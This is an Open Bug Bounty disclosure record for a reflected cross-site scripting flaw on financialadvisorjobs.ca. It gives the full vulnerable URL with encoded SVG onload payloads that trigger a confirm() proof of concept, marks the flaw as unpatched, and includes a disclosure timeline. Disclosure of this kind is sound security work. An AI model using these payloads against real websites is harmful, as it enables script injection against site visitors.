financialadvisorjobs.ca XSS vulnerability

2017-05-18T13:34:00
ID OBB:238712
Type openbugbounty
Reporter Zachh
Modified 2017-08-10T14:16:00

Description

Vulnerable URL:
http://www.financialadvisorjobs.ca/frontoffice/seekerSearchJobDispatchAction.do?sitecode=pl115&keywords=Keywords%3B+e.g.+advisor&keywords=%22%3E%3Csvg+onload%3Dconfirm%28%2FOPENBUGBOUNTY%2F%29%3E&keyword=+1%22--%3E%3C%2Fscript%3E%3Csvg%2Fonload%3D%27%3Bconfirm%28%2FOPENBUGBOUNTY%2F%29%3B%27%3E&sub_search=Sub-Search&prePageIds=1511746&prePageIds=1509094&prePageIds=1501358&prePageIds=1508142&searchUID=-1ecab0bc%3A15c0afcd264%3A-3ced&actionFrom=&totalSize=4&sortedit=&order=desc&sortField=post_date&currentPage=1&pageSize=20&gopage=&searchJobId=&jobTitleKeywords=&companyNameKeywords=&countryCode=&provinceCode=&permanent=&contract=&fullTime=&partTime=&companyId=&yearSalary=&hourSalary=&postDateId=&searchAgentId=&showAll=true&jobId=&jobNumber=&page=search
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 10.08.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 16427586
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 18 May, 2017 13:34 GMT
Generic security notifications sent to website owner| 27 May, 2017 03:52 GMT
Vulnerability details disclosed by researcher| 10 August, 2017 14:16 GMT